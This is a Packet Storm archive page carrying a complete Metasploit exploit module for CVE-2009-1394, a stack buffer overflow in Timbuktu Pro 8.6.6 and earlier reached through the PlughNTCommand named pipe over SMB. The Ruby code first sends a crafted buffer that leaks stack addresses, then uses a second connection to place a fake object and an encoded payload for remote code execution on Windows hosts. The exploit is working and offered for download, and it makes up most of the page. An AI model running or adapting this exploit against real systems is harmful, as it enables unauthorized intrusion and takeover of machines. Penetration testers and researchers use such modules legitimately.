exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow

Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow
Posted Dec 31, 2009
Authored by bannedit | Site metasploit.com

This Metasploit module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6 in a pretty novel way. This exploit requires two connections. The first connection is used to leak stack data using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying a large value for this argument it is possible to cause Timbuktu to reply to the initial request with leaked stack data. Using this data allows for reliable exploitation of the buffer overflow vulnerability. Props to Infamous41d for helping in finding this exploitation path. The second connection utilizes the data from the data leak to accurately exploit the stack based buffer overflow vulnerability. TODO: hdm suggested using meterpreter's migration capability and restarting the process for multishot exploitation.

tags | exploit, overflow
advisories | CVE-2009-1394
SHA-256 | 1a3eb49398ce9b0ab57cd1e8f8fcef3eb6dad5ad3499db7694e64b4fa58552a2

Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::SMB

def initialize(info = {})
super(update_info(info,
'Name' => 'Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6
in a pretty novel way.

This exploit requires two connections. The first connection is used to leak stack data
using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying
a large value for this argument it is possible to cause Timbuktu to reply to the initial
request with leaked stack data. Using this data allows for reliable exploitation of the
buffer overflow vulnerability.

Props to Infamous41d for helping in finding this exploitation path.

The second connection utilizes the data from the data leak to accurately exploit
the stack based buffer overflow vulnerability.

TODO:
hdm suggested using meterpreter's migration capability and restarting the process
for multishot exploitation.
},
'Author' => [ 'bannedit' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7940 $',
'References' =>
[
[ 'CVE', '2009-1394' ],
[ 'OSVDB', '55436' ],
[ 'BID', '35496' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
'Targets' =>
[
# we use a memory leak technique to get the return address
# tested on Windows XP SP2/SP3 may require a bit more testing
[ 'Automatic Targeting',
{
# ntdll .data (a fairly reliable address)
# this address should be relatively stable across platforms/SPs
'Writable' => 0x7C97B0B0 + 0x10 - 0xc
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Jun 25 2009',
'DefaultTarget' => 0))
end


# we make two connections this code just wraps the process
def smb_connection

connect()
smb_login()

print_status("Connecting to \\\\#{datastore['RHOST']}\\PlughNTCommand named pipe")

pipe = simple.create_pipe('\\PlughNTCommand')

fid = pipe.file_id
trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')

return pipe

end


def mem_leak

pipe = smb_connection()

print_status("Constructing memory leak...")

writable_addr = target['Writable']

buf = make_nops(114)
buf[0] = "3 " # specifies the command
buf[94] = [writable_addr].pack('V') # this helps us by pass some checks in the code
buf[98] = [writable_addr].pack('V')
buf[110] = [0x1ff8].pack('V') # number of bytes to leak

pipe.write(buf)
leaked = pipe.read()
leaked << pipe.read()

if (leaked.length < 0x1ff8)
print_error("Error: we did not get back the expected amount of bytes. We got #{leaked.length} bytes")
pipe.close
disconnect
return
end


offset = 0x1d64
stackaddr = leaked[offset, 4].unpack('V')[0]
bufaddr = stackaddr - 0xcc8

print_status "Stack address found: stack #{sprintf("0x%x", stackaddr)} buffer #{sprintf("0x%x", bufaddr)}"

print_status("Closing connection...")
pipe.close
disconnect

return stackaddr, bufaddr

end


def exploit

stackaddr, bufaddr = mem_leak()

if (stackaddr.nil? || bufaddr.nil? ) # just to be on the safe side
print_error("Error: memory leak failed")
end

pipe = smb_connection()

buf = make_nops(1280)
buf[0] = "3 "
buf[94] = [bufaddr+272].pack('V') # create a fake object
buf[99] = "\x00"
buf[256] = [bufaddr+256].pack('V')
buf[260] = [bufaddr+288].pack('V')
buf[272] = "\x00"
buf[512] = payload.encoded

pipe.write(buf)

end

end
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close